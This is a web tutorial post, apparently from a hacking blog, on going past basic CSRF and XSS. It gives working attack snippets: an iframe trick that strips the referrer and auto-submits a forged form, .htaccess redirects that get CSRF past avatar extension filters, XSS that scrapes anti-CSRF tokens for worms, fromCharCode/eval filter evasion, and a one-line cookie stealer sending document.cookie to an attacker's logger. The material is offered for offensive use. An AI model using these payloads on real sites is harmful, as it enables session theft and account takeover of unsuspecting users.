Papers

Published on June 4th, 2016 📆 | 6632 Views ⚑

0

Going a little bit deeper into csrf and xss


https://www.ispeech.org
You need to know beyond the basics of xss and csrf to have any use of this text.

HOW TO CLEAN THE REFERRER

Sometimes when you got a csrf exploit ready, you notice that if the referrer is not the domain where your exploit goes to, it gets rejected.
What you have to do then, is to clean the referrer.

To do this, you have to clean the referrer by doing this:

<iframe width="300"100" height="400"100" src="java script:'<form action=https://yay.net/login.php method=post><input type=text name=username value=test><input type=text name=password value=testdd></form><script>document.forms[0].submit()</script>'"></iframe>

Remember to remove the space between java and script. This code will create an iframe with the javascript: thingie, create a form on that blank page, and submit it. This will make the referrer clean, and you will circumvent any referrer checks.

If they dont even accept blank referrers, I dont think theres anything you can do about it.

HOW TO CURCUMVENT FILE EXTENSION CHECKS

On forums and online communities you can often use an avatar, which you link from the web. And very often, only extensions like .jpg .png etc are allowed. What you have to do then, is to use apache's htaccess.

Make a folder on your webspace. Make a .htaccess file with the following content:

Redirect https://yay.com/pic.jpg https://csrf_here

The extension filter will not trigger. But when the image is displayed, the browser will find the http 301 redirect, and fetch the new page.

This way, you can redirect to logout.php or delete.php?id=34 etc.

Note that this cannot be used to redirect to POST csrf exploits. Because the browser does not interpret the html response code, it only queries it.

Additionally you can do fun stuff like redirecting to mailto:evil_popup or other protocols. Redirecting to java script: does not work though, and thank god for that.

HOW TO DO CSRF WHEN THERE ARE TOKEN CHECKS

If you make a csrf exploit which changes name, email or whatever, you may see that the site uses tokens to prevent this. To circumvent this, you need to find an xss flaw. When you find one, you can inject js, which will fetch the tokens which are needed.

https://pastebin.com/m7203ede5 Take a look at this code

This code will query /editprofile. The html code of that page contains the token, which is needed to change things.

This is the most interesting part:

data = ajaxRequest.responseText;
k = data.match("[0-9]{32}");

This is called a regular expres<span style='display:none'>blocked</span>sion. And it will search the html code for a number, which is exactly 32 digits long. And there is only one number which is that long, and thats our token.

This token will be stored in the variable k. Then you use that token to do another ajax request, or you can create a new form dynamically and submit it. The point is, with the fethed token, you can do what you want. Change email, password, deleteaccount, change status etc.

This token fetching is very often needed when creating an xss worm.

wHAT TO DO IF QOUTES ARE FILTERED AWAY

Very often, you find that " and ' are escaped, replaced or removed. In that case, code like this wont work:

document.location.href="https://csrf"

Because the " are escaped.

To make code which has no " or ' in it, you can use js's function fromCharCode().

https://www.wocares.com/noquote.php Use this tool to encode your js.

E.g. to make alert("yo") work, the code would be like this:

String.fromCharCode(97,108,101,114,116,40,54,41)

This code alone wont make the alert work. You need to wrap it around the eval() function, like this:

eval(String.fromCharCode(97,108,101,114,116,40,54,41))

HOW TO SILENTLY STEAL COOKIES

The document.location.href is quite noisy, and people will kind of understand something not good is happening. But theres a way to send off the cookies by doing this:

new Image().src='https://logger.php?cookie='+document.cookie

This wont send the user anywhere, but silently send the cookies off to your server.

FINAL WORDS

I hope you learned something from this text, and that you give it a 10/10.

If the feedback is good, I am going to write more advanced stuff on this subject 🙂
Feedback on the language/grammatics is also wanted, because english isnt my main language.

 

@RAPTOR



Leave a Reply

Your email address will not be published.